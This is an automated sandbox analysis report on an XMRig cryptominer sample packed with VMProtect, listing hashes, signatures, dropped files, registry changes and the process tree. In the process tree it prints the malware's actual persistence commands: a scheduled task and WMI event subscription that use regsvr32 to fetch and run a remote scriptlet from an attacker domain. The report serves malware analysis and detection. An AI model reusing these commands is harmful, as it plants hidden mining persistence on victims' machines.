xmrig | cccdcd65247b27e1d3587cc6d365a5dd703954ec578f288ccf2c97b85837b069

Analysis

max time kernel
148s
max time network
119s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
26/05/2024, 11:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe
Size

348KB
MD5

75497caaa52797d58a70cdbe1cb1252c
SHA1

a3ee3f7b8940dfadfc728b7467679879640f9578
SHA256

cccdcd65247b27e1d3587cc6d365a5dd703954ec578f288ccf2c97b85837b069
SHA512

f3f9ab4f058af45f4b148433f565fa1d602339b52cca84ea8dd1dc1ef59c1c7050cf04421a77dd557e81ddf316a5177ff89bfafb50de5f26d7ca85289b50d2d6
SSDEEP

6144:FbF9t7qqDX+ZUMPyc0vcDDleaLDnKVaG1S/YNe7Y:5D4qr+SMPGv2DleaLDnKkG1fl

Score

10^/10

xmrig miner vmprotect

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1912	2580	regsvr32.exe	33

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 3 IoCs

miner

resource	yara_rule
behavioral1/memory/1632-0-0x000000013FA50000-0x000000013FB0C000-memory.dmp	xmrig
behavioral1/memory/1632-1-0x000000013FA50000-0x000000013FB0C000-memory.dmp	xmrig
behavioral1/memory/1632-4-0x000000013FA50000-0x000000013FB0C000-memory.dmp	xmrig

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/memory/1632-0-0x000000013FA50000-0x000000013FB0C000-memory.dmp	vmprotect
behavioral1/memory/1632-1-0x000000013FA50000-0x000000013FB0C000-memory.dmp	vmprotect
behavioral1/memory/1632-4-0x000000013FA50000-0x000000013FB0C000-memory.dmp	vmprotect

Drops file in System32 directory 17 IoCs

description	ioc	Process
File created	C:\Windows\system32\perfc011.dat	WmiApSrv.exe
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.h	WmiApSrv.exe
File created	C:\Windows\system32\perfh00A.dat	WmiApSrv.exe
File created	C:\Windows\system32\perfh00C.dat	WmiApSrv.exe
File created	C:\Windows\system32\PerfStringBackup.TMP	WmiApSrv.exe
File created	C:\Windows\system32\perfh007.dat	WmiApSrv.exe
File created	C:\Windows\system32\perfh009.dat	WmiApSrv.exe
File created	C:\Windows\system32\perfc009.dat	WmiApSrv.exe
File created	C:\Windows\system32\perfc00A.dat	WmiApSrv.exe
File created	C:\Windows\system32\perfc00C.dat	WmiApSrv.exe
File created	C:\Windows\system32\perfc010.dat	WmiApSrv.exe
File created	C:\Windows\system32\perfh011.dat	WmiApSrv.exe
File opened for modification	C:\Windows\system32\PerfStringBackup.INI	WmiApSrv.exe
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini	WmiApSrv.exe
File created	C:\Windows\system32\perfc007.dat	WmiApSrv.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	regsvr32.exe
File created	C:\Windows\system32\perfh010.dat	WmiApSrv.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\inf\WmiApRpl\WmiApRpl.h	WmiApSrv.exe
File opened for modification	C:\Windows\inf\WmiApRpl\WmiApRpl.h	WmiApSrv.exe
File created	C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini	WmiApSrv.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3056	SchTasks.exe

Modifies data under HKEY_USERS 24 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecisionTime = 30c2f59c5dafda01	regsvr32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecision = "0"	regsvr32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	regsvr32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	regsvr32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecisionReason = "1"	regsvr32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}	regsvr32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\WpadDecisionReason = "1"	regsvr32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\WpadDecision = "0"	regsvr32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\WpadNetworkName = "Network 3"	regsvr32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\ee-11-a7-3b-9b-9c	regsvr32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	regsvr32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	regsvr32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f003e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	regsvr32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	regsvr32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	regsvr32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	regsvr32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	regsvr32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	regsvr32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	regsvr32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\WpadDecisionTime = 30c2f59c5dafda01	regsvr32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	regsvr32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	regsvr32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	regsvr32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c	regsvr32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2520	wmic.exe
Token: SeSecurityPrivilege	2520	wmic.exe
Token: SeTakeOwnershipPrivilege	2520	wmic.exe
Token: SeLoadDriverPrivilege	2520	wmic.exe
Token: SeSystemProfilePrivilege	2520	wmic.exe
Token: SeSystemtimePrivilege	2520	wmic.exe
Token: SeProfSingleProcessPrivilege	2520	wmic.exe
Token: SeIncBasePriorityPrivilege	2520	wmic.exe
Token: SeCreatePagefilePrivilege	2520	wmic.exe
Token: SeBackupPrivilege	2520	wmic.exe
Token: SeRestorePrivilege	2520	wmic.exe
Token: SeShutdownPrivilege	2520	wmic.exe
Token: SeDebugPrivilege	2520	wmic.exe
Token: SeSystemEnvironmentPrivilege	2520	wmic.exe
Token: SeRemoteShutdownPrivilege	2520	wmic.exe
Token: SeUndockPrivilege	2520	wmic.exe
Token: SeManageVolumePrivilege	2520	wmic.exe
Token: 33	2520	wmic.exe
Token: 34	2520	wmic.exe
Token: 35	2520	wmic.exe
Token: SeIncreaseQuotaPrivilege	3004	wmic.exe
Token: SeSecurityPrivilege	3004	wmic.exe
Token: SeTakeOwnershipPrivilege	3004	wmic.exe
Token: SeLoadDriverPrivilege	3004	wmic.exe
Token: SeSystemProfilePrivilege	3004	wmic.exe
Token: SeSystemtimePrivilege	3004	wmic.exe
Token: SeProfSingleProcessPrivilege	3004	wmic.exe
Token: SeIncBasePriorityPrivilege	3004	wmic.exe
Token: SeCreatePagefilePrivilege	3004	wmic.exe
Token: SeBackupPrivilege	3004	wmic.exe
Token: SeRestorePrivilege	3004	wmic.exe
Token: SeShutdownPrivilege	3004	wmic.exe
Token: SeDebugPrivilege	3004	wmic.exe
Token: SeSystemEnvironmentPrivilege	3004	wmic.exe
Token: SeRemoteShutdownPrivilege	3004	wmic.exe
Token: SeUndockPrivilege	3004	wmic.exe
Token: SeManageVolumePrivilege	3004	wmic.exe
Token: 33	3004	wmic.exe
Token: 34	3004	wmic.exe
Token: 35	3004	wmic.exe
Token: SeLockMemoryPrivilege	1632	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe
Token: SeIncreaseQuotaPrivilege	2852	wmic.exe
Token: SeSecurityPrivilege	2852	wmic.exe
Token: SeTakeOwnershipPrivilege	2852	wmic.exe
Token: SeLoadDriverPrivilege	2852	wmic.exe
Token: SeSystemProfilePrivilege	2852	wmic.exe
Token: SeSystemtimePrivilege	2852	wmic.exe
Token: SeProfSingleProcessPrivilege	2852	wmic.exe
Token: SeIncBasePriorityPrivilege	2852	wmic.exe
Token: SeCreatePagefilePrivilege	2852	wmic.exe
Token: SeBackupPrivilege	2852	wmic.exe
Token: SeRestorePrivilege	2852	wmic.exe
Token: SeShutdownPrivilege	2852	wmic.exe
Token: SeDebugPrivilege	2852	wmic.exe
Token: SeSystemEnvironmentPrivilege	2852	wmic.exe
Token: SeRemoteShutdownPrivilege	2852	wmic.exe
Token: SeUndockPrivilege	2852	wmic.exe
Token: SeManageVolumePrivilege	2852	wmic.exe
Token: 33	2852	wmic.exe
Token: 34	2852	wmic.exe
Token: 35	2852	wmic.exe
Token: SeIncreaseQuotaPrivilege	2520	wmic.exe
Token: SeSecurityPrivilege	2520	wmic.exe
Token: SeTakeOwnershipPrivilege	2520	wmic.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1632 wrote to memory of 3056	1632	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	29
PID 1632 wrote to memory of 3056	1632	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	29
PID 1632 wrote to memory of 3056	1632	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	29
PID 1632 wrote to memory of 2520	1632	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	30
PID 1632 wrote to memory of 2520	1632	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	30
PID 1632 wrote to memory of 2520	1632	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	30
PID 1632 wrote to memory of 2852	1632	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	31
PID 1632 wrote to memory of 2852	1632	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	31
PID 1632 wrote to memory of 2852	1632	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	31
PID 1632 wrote to memory of 3004	1632	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	32
PID 1632 wrote to memory of 3004	1632	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	32
PID 1632 wrote to memory of 3004	1632	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	32

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1632
- C:\Windows\system32\SchTasks.exe
  SchTasks.exe /Create /SC MINUTE /TN WindowsUpdateInternel /TR "regsvr32 /s /n /u /i:http://down.cacheoffer.tk/d2/reg9.sct scrobj.dll" /MO 5 /F
  2⤵
  - Creates scheduled task(s)
  PID:3056
- C:\Windows\System32\Wbem\wmic.exe
  wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter CREATE Name="H888", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_PerfFormattedData_PerfOS_System" AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2520
- C:\Windows\System32\Wbem\wmic.exe
  wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer CREATE Name="H999", CommandLineTemplate="regsvr32 /s /n /u /i:http://down.cacheoffer.tk/d2/reg9.sct scrobj.dll"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2852
- C:\Windows\System32\Wbem\wmic.exe
  wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"H888\"", Consumer="CommandLineEventConsumer.Name=\"H999\""
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3004

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:2600

C:\Windows\system32\regsvr32.exe
regsvr32 /s /n /u /i:http://down.cacheoffer.tk/d2/reg9.sct scrobj.dll
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\perfc007.dat

Filesize
141KB

MD5
cea1b98ec0c3919cc62c836e00c68863

SHA1
e02600d4cb930ce357e0df3a1acf3a33ad238fa3

SHA256
8f44cd24382a3719b6fe3b0866286f4543257629b087fba76bc43158c22faed6

SHA512
af44659dfa613c9a30761b996453e5ff6b5d7ed1e5e5b1003b2f2d6348507bbc4ccd54ced36981fb50706ce880cea69994cfbafccfeb1e19f23c05623c198644

Download Submit
C:\Windows\System32\perfc00A.dat

Filesize
150KB

MD5
5fe26038676903a26f9b5c18cb89a3af

SHA1
7733ca2859fd63d4031cae579ef969b3c1c40697

SHA256
c93baa487d4cc947ade03b8198e8031a2e85285e3a8681d8b42b35bdfc2bba6f

SHA512
2e3ed43d68df58b6fa15bd13587ddcccf6396d688a27f7122f89f56373af2f46356f7279fd08a41d673903e82af159d383b245f73bfc69de370e5bb699b03c4a

Download Submit
C:\Windows\System32\perfc00C.dat

Filesize
141KB

MD5
822e634903f0f097472909713272812c

SHA1
00014d6d5586deea745580e8555df39115f3e0aa

SHA256
6dd5e379751f7294a604c8235162e782d10a2f426239e2c0ea479b732da4f693

SHA512
2e0feb10dcdcbce6609d3ea07e20ac2050429081baaa30704a13848c839670b68fa75696d8741cc7473b7ee993843a086e80a6c433f93ab8d22ecd07d72855c4

Download Submit
C:\Windows\System32\perfc010.dat

Filesize
142KB

MD5
71b854c727e136df2704232789a09457

SHA1
015010461e0c9f499047591ae850c9d013a04f33

SHA256
aa180f83eff8188abc3594032c36a545bb81d9fa01973aa74cf3977f2eeb2459

SHA512
17e31ecf14815d4387acc86f34591ce16ccc099557bc2265135be62314d4c6f0946d9472690de8c43313d1839112556ffeee91322dcd656830be234511b1a9f0

Download Submit
C:\Windows\System32\perfc011.dat

Filesize
114KB

MD5
bee5d91b496fb80f633b314b1dbb55eb

SHA1
25c99dd2d14166bdb16a3b0238204fa8c0094780

SHA256
60f1cd5bc3deb6245e628c6be28bb5425e9c9c24437832929f4d55265ce51334

SHA512
468c5745197bf8a044236dcb86ee398d269e35ef1c93bceb171c9e99bd2bcb39240cbe8280daa8f3d0af4f93b616a47d5d73188c3d2fce244f9ad2e089e2f460

Download Submit
C:\Windows\System32\perfh007.dat

Filesize
668KB

MD5
5bf32d9691933ae11b5eada31f1a2377

SHA1
1124bab5271e006d69968eb2bb365e26fb02e3dd

SHA256
26e51dd53f5835053443c5b07158243e71e7baf840af6553a144adade35cad98

SHA512
633aaca0a283891d7ff034c2ce22e98b804ecf2f617ce131e5680f43f52d011c10fb7267987c09fa9b803c93ccedbb9f40325f3229a9228ed1c1d236ce55e8f1

Download Submit
C:\Windows\System32\perfh009.dat

Filesize
634KB

MD5
2607d7f6cb436cfc13dcb11cd9d00b66

SHA1
3e6fec2467a5df541d074fe0e0022eba8232770f

SHA256
d9853dc6c034b3a304321c8d26274cb1579a4d20499b68b76fb3b947fb30b975

SHA512
b53817c724409e5794a4d767bbb0fc16badc7a5088165401728885daecd0a6d986bc42f80c70cbd98d8602b6ffe742d7ac6c71dfc05a95e4210b4c2185d3a5ee

Download Submit
C:\Windows\System32\perfh00A.dat

Filesize
715KB

MD5
d18094b6e68efa9614d1e416fb102f4d

SHA1
131620905e016bc2e5af2fb460aade913b66d48d

SHA256
1523ee3af7aa4808b9b7b653ef832a42eae718f73f9928ca78c0e2073e1102dc

SHA512
0257a3be68815d4a6c62f15070c9f56494181dec7eca30ff0ce2b6fc38c1c41a762906e6574b8052b1c9b066f75cadf654827abcb42a8894f55df8a360902e21

Download Submit
C:\Windows\System32\perfh00C.dat

Filesize
715KB

MD5
83b8ddadf5ee6b232ddc0b838513fc4d

SHA1
3190361e0dbba650db72dc694c8ae1468c54faf7

SHA256
f71fa81e3e44ed984753867048874e68820b29eaa719607d8cd9019b5c70dac7

SHA512
4a5c75769fce64b6f73b9163827d073f28652bd32d7d3bcf58bceb00baae222a6e588eb4d19fc9727940408da09131feb03c43f1a345bf3027c07a0248f8316b

Download Submit
C:\Windows\System32\perfh010.dat

Filesize
722KB

MD5
37997b4a765e0df0944deb7b3c68fc9f

SHA1
7f70b0f88f8353e6e382f80b38d47736e2de81ca

SHA256
f82abb5bf658ddc5bbf83b786d83636f830494a3c259140cab60e52582c87ac6

SHA512
e28605ce84f795aa8b100c8da3129a8ed370861bd229265f0a1093fbb0ec5ed13e78657f30f266a707848e1f651543b4dc5fdf5ad61ed5e61b1e68ff03dcb25c

Download Submit
C:\Windows\System32\perfh011.dat

Filesize
406KB

MD5
0e026eb49e299091e1b0052091c3054d

SHA1
bc2ba534a80f8eb70513fc3a21b8189bcb66e7a3

SHA256
7c61b56375d8dea0a9e1992763fd118b717898fe3a58270288026caad3c29e44

SHA512
b4eff969eb5ae37219fa865b9b3649a64aa4f022cc4d1bacb44af06bdaf0bb6d8ff764cc0f2d0d5596895a24a8e30ffdbff28065ed84e3fcfdfe1087c417b2a8

Download Submit
C:\Windows\System32\wbem\Performance\WmiApRpl.h

Filesize
3KB

MD5
b133a676d139032a27de3d9619e70091

SHA1
1248aa89938a13640252a79113930ede2f26f1fa

SHA256
ae2b6236d3eeb4822835714ae9444e5dcd21bc60f7a909f2962c43bc743c7b15

SHA512
c6b99e13d854ce7a6874497473614ee4bd81c490802783db1349ab851cd80d1dc06df8c1f6e434aba873a5bbf6125cc64104709064e19a9dc1c66dcde3f898f5

Download Submit
C:\Windows\System32\wbem\Performance\WmiApRpl.ini

Filesize
27KB

MD5
46d08e3a55f007c523ac64dce6dcf478

SHA1
62edf88697e98d43f32090a2197bead7e7244245

SHA256
5b15b1fc32713447c3fbc952a0fb02f1fd78c6f9ac69087bdb240625b0282614

SHA512
b1f42e70c0ba866a9ed34eb531dbcbae1a659d7349c1e1a14b18b9e23d8cbd302d8509c6d3a28bc7509dd92e83bcb400201fb5d5a70f613421d81fe649d02e42

Download Submit
memory/1632-0-0x000000013FA50000-0x000000013FB0C000-memory.dmp

Filesize
752KB

Download
memory/1632-4-0x000000013FA50000-0x000000013FB0C000-memory.dmp

Filesize
752KB

Download
memory/1632-1-0x000000013FA50000-0x000000013FB0C000-memory.dmp

Filesize
752KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads